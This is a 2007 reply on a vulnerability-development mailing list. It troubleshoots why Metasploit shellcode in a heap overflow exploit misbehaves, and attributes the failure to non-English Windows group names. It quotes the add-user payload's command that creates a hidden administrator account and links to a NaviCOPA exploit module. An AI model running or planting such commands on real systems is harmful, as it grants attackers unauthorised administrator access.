Vuln Dev
Weird shellcode behavior May 06 2007 05:55PM
gljuposti gmail com (1 replies)
Re: Weird shellcode behavior May 07 2007 06:06AM
Jerome Athias (jerome athias free fr)
Hi,

gljuposti (at) gmail (dot) com [email concealed] wrote :
> I am building an exploit (heap OF) and I am experiencing different shellcode behavior depending on the parametar I can in no way associate with this problem. For one parametar value the shellcode gets executed correctly, but for the other, there are problems.
>
> For example, the calc.exe shellcode creates a calc.exe process (I can see it in task manager), but its window is never displayed.
Exploiting NaviCOPA HTTP server provide a similar scenario.
Since there are 2 process running:
navicpt.exe (behind the shortcut on your desktop ;)
nacicpnt.exe (the targeted process)

Since in a real world you should not just to want to run calc on the
target, i assume it's ok :-)
> Some other shellcodes like the add user shellcode don't work at all. I use shellcodes from Metasploit.
>
> The shellcode gets called each time and it hasn't been changed in memory, it just doesn't behave like it should.
>
If you are sure that you correctly found the badchars, the reason could
be that your target is not an english one.
If you edit the shellcode's source code (single_adduser.asm), you will see:
db "cmd.exe /c net user metasploit x /ADD && net localgroup
Administrators metasploit /ADD"

For an italian target, for example, you should have to replace
"Administrators" with something like " Amministratori"
> Has anyone ever experienced something similar or has any idea why it could happen? This leaves me totaly confused.
>
> TIA
References:
https://www.securinfos.info/jerome/navicopa_get_overflow.rb
(dev version)
https://www.securinfos.info/old_softwares_vulnerable/_navicpa_old.exe
(vuln version)

PS: i'm thinking to add a list of the name of the Administrators group
in multiple languages in my MSF eXploit Builder tool to be able to
modify it on the fly based on the locale chosen
https://www.securinfos.info/metasploit/MSF_XB.php
So i invite people using a non-english Windows platform to send me the
Administrators' group name with the corresponding locale (language).
thanks in advance ;-)

Hope it helps
/JA

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus